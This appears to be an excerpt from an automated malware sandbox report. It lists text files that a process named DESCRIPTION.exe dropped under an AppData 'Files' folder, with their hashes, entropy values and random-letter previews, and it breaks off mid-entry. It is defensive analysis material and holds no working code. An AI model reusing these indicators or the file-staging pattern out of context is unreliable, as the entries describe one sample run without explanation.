                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.6980379859154695
                                                              Encrypted:false
                                                              SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                                              MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                                              SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                                              SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                                              SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                                              Malicious:false
                                                              Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SQSJKEBWDT.docx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.698473196318807
                                                              Encrypted:false
                                                              SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                              MD5:4D0D308F391353530363283961DF2C54
                                                              SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                              SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                              SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                              Malicious:false
                                                              Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SQSJKEBWDT.pdf

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.698473196318807
                                                              Encrypted:false
                                                              SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                              MD5:4D0D308F391353530363283961DF2C54
                                                              SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                              SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                              SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                              Malicious:false
                                                              Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SUAVTZKNFL.pdf

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.69422273140364
                                                              Encrypted:false
                                                              SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                              MD5:A686C2E2230002C3810CB3638589BF01
                                                              SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                              SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                              SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                              Malicious:false
                                                              Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SUAVTZKNFL.xlsx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.69422273140364
                                                              Encrypted:false
                                                              SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                              MD5:A686C2E2230002C3810CB3638589BF01
                                                              SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                              SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                              SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                              Malicious:false
                                                              Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.docx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.696835919052288
                                                              Encrypted:false
                                                              SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                              MD5:197C0DB71198B230CF6568A2AA40C23B
                                                              SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                              SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                              SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                              Malicious:false
                                                              Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.xlsx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.696835919052288
                                                              Encrypted:false
                                                              SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                              MD5:197C0DB71198B230CF6568A2AA40C23B
                                                              SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                              SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                              SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                              Malicious:false
                                                              Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WXDORXTPKQ.pdf

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.699682130517912
                                                              Encrypted:false
                                                              SSDEEP:24:sgyvftug90MDF5IRA/LKLzDJ9sRErKfjkEm3T07nv4YjP:sjvY60qF5IwMHDJCU3T07wY7
                                                              MD5:BE73D31D49041538544284F58B4449A1
                                                              SHA1:438A10BEDE8B10D0D857242808FF720301E225E1
                                                              SHA-256:9CB35DD955B8EA71883ED4356D94ED04019D601A52C20C65886FDE7D9397004B
                                                              SHA-512:7E19E5EB063B5DE735CBE6D4AAAB41E5B2713D2A06A531A9DB9F5C32928C0B5D5D5C4E6F228588F4FC58D12567CA8340528B1E20ABB699C4CF0F1A604CD19DF2
                                                              Malicious:false
                                                              Preview:WXDORXTPKQJCISHIUNDOWXNENBCBYLNROENUHXYEYFGPWBVSNDHEMEMJPSFDJTBISJWVYKDTPHIONXEZSPEYPAZGMARDJCBXHXBAYIFOGIWANLXITQLTXKORBDITABNQTBBFPSACPBZAHZZFRLNEZXRPGATVHPFWHSMAYHZLNLYBJGJDHYVEFVVCQBHDIRHFMCLGBTYRSFXGMGSJETXHZMTLZWABCYMTSEPBOIKBJBXDKAAPCMVFLQGNUIREDHCFJCCGAVODDTXUZQJLJZVPUOQWRITYNWOQSICBMVJPUUMODWFEQXHYTYVJVFVRTFAFQXFKRLCPKRFCQIXZABOUBQNHGUFXWPVOVUZTADEIHBCVWNUYXKUJGFKTHNLKKCHWYIRACQVRUISSBMHCJOOAQMIHGYZPCKDAREKMSWQVGBAXMOVJDHRILTXXJNTMAUPCDOPCCMIHYYDSOIFJWVUEWUFXFYFQASGQVDTLLASOUSSJNXJFLRYXWARAFDPGWTSZRINPZAVOOSAASYFIWCVOEIXLBFQNZSUPZTCJJZDEYQIYZXDXEIVVMGOPMBXURBXADHEMERCJECGKDNJIUTAGUJUOYQSWGMCQFCENOPKMEWZFOWXETFYIFDFNGBFJCBDPSOJEAIRRAILZXENAWAPCUVYLHCVTYPQBSLVTKHYHQIXTVLBQYSSJOCOEDOEMNEXQGPOJWUOVOZQAFJCUZDYEQSOAPJMDZFIYJCLANLEPDPGAAOGOGVWXEPXOJIYOSSFLTZPYJBPBMDTPUSYSJXRGKGYGUNJOHWRZGOUWQHGPWERLJZWWDJDUNLUCHZVJBYLZGAXTQRCNWTNWQDEKSCLSYXCJINJDLODGVOXPKNVXRORMSFFPDLOLKIKSAUOWXCTFSBGVNZRCDFENLMHYWWJJQBHOJLVBCGTPDGVRCVNUJMLSZHUGNKZCFEQDVFOWMFHFZEXURTFZRDFIFDHTTXTTYAGWNBMICOCWSERWYQYT

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.docx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.6959554225029665
                                                              Encrypted:false
                                                              SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                              MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                              SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                              SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                              SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                              Malicious:false
                                                              Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.6959554225029665
                                                              Encrypted:false
                                                              SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                              MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                              SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                              SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                              SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                              Malicious:false
                                                              Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZIPXYXWIOY.docx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.697427014915338
                                                              Encrypted:false
                                                              SSDEEP:24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
                                                              MD5:2D7ACA56B5F340F28DD1D2B46D700BA6
                                                              SHA1:3966684FF029665614B8DC948349178FB9E8C078
                                                              SHA-256:B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
